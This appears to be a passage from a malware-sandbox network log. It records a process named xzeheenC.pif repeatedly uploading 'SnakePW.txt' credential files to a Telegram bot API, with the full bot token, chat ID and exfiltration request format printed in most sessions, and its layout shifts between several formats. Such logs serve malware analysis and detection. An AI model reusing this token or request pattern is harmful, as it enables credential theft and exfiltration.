                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:36 UTC  111                IN         Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
13          192.168.2.5  49847        149.154.167.220  443               432   C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:35 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd1fab8db33d56
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:35 UTC  535                OUT        Data Ascii: --------------------------8dd1fab8db33d56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:36 UTC  370                IN         HTTP/1.1 429 Too Many Requests
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 111
                                                       Connection: close
                                                       Retry-After: 10
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:36 UTC  111                IN         Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
14          192.168.2.5  49848        149.154.167.220  443               2140  C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:35 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd1f7c87e875f8
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:35 UTC  535                OUT        Data Ascii: --------------------------8dd1f7c87e875f8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:36 UTC  370                IN         HTTP/1.1 429 Too Many Requests
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 111
                                                       Connection: close
                                                       Retry-After: 10
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:36 UTC  111                IN         Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
15          192.168.2.5  49854        149.154.167.220  443               6656  C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:37 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd2056f7803414
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:37 UTC | 535 | OUT
Data Ascii: --------------------------8dd2056f7803414Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:49 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:49 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:49 UTC | 517 | IN
Data Ascii: {"ok":true,"result":{"message_id":418836,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49856 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f9415ada89a
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:37 UTC | 535 | OUT
Data Ascii: --------------------------8dd1f9415ada89aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:49 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:49 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:49 UTC | 515 | IN
Data Ascii: {"ok":true,"result":{"message_id":418838,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49857 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fc2f018f4d8
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:37 UTC | 535 | OUT
Data Ascii: --------------------------8dd1fc2f018f4d8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:49 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:49 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:49 UTC | 515 | IN
Data Ascii: {"ok":true,"result":{"message_id":418839,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49888 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:50 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20e90cf9d34f
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:50 UTC | 535 | OUT
Data Ascii: --------------------------8dd20e90cf9d34fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:51 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:51 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:51 UTC | 515 | IN
Data Ascii: {"ok":true,"result":{"message_id":418843,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49889 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:50 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2032ce18b5a9
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:50 UTC | 535 | OUT
Data Ascii: --------------------------8dd2032ce18b5a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:51 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:51 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:51 UTC | 515 | IN
Data Ascii: {"ok":true,"result":{"message_id":418841,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49890 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:50 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2056fe5a93ed
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:50 UTC | 535 | OUT
Data Ascii: --------------------------8dd2056fe5a93edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:51 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:51 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:51 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418844,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49896 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:52 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd2049c4599bf0
    Host: api.telegram.org
    Content-Length: 535
2024-12-18 15:17:52 UTC | 535 | OUT | Data Ascii: --------------------------8dd2049c4599bf0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:53 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 18 Dec 2024 15:17:53 GMT
    Content-Type: application/json
    Content-Length: 515
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:53 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418846,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49897 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:52 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd2101f28456d5
    Host: api.telegram.org
    Content-Length: 535
2024-12-18 15:17:52 UTC | 535 | OUT | Data Ascii: --------------------------8dd2101f28456d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:53 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 18 Dec 2024 15:17:53 GMT
    Content-Type: application/json
    Content-Length: 515
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:53 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418848,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49898 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:52 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd206c71d33bae
    Host: api.telegram.org
    Content-Length: 535
2024-12-18 15:17:52 UTC | 535 | OUT | Data Ascii: --------------------------8dd206c71d33baeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:53 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 18 Dec 2024 15:17:53 GMT
    Content-Type: application/json
    Content-Length: 515
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:53 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418849,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49903 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:54 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd205f4e93af8a
    Host: api.telegram.org
    Content-Length: 535
2024-12-18 15:17:54 UTC | 535 | OUT | Data Ascii: --------------------------8dd205f4e93af8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:55 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 18 Dec 2024 15:17:55 GMT
    Content-Type: application/json
    Content-Length: 515
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:55 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418852,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.5 | 49904 | 149.154.167.220 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:54 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd211ac1c4f774
    Host: api.telegram.org
    Content-Length: 535
2024-12-18 15:17:54 UTC | 535 | OUT | Data Ascii: --------------------------8dd211ac1c4f774Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:55 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 18 Dec 2024 15:17:55 GMT
    Content-Type: application/json
    Content-Length: 515
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:55 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418854,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.549905149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:54 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2081d1ada311
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:54 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 38 31 64 31 61 64 61 33 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2081d1ada311Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:55 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:55 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:55 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418855,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49911 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:56 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20761e459bea
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:56 UTC | 535 | OUT
Data Ascii:
--------------------------8dd20761e459bea
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:17:05
Client IP:
2024-12-18 15:17:57 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:57 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418858,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49912 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:56 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21322c4586e7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:56 UTC | 535 | OUT
Data Ascii:
--------------------------8dd21322c4586e7
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:16:48
Client IP:
2024-12-18 15:17:57 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:57 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418861,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49913 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:57 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2098731e7d87
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:57 UTC | 535 | OUT
Data Ascii:
--------------------------8dd2098731e7d87
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:17:00
Client IP:
2024-12-18 15:17:57 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
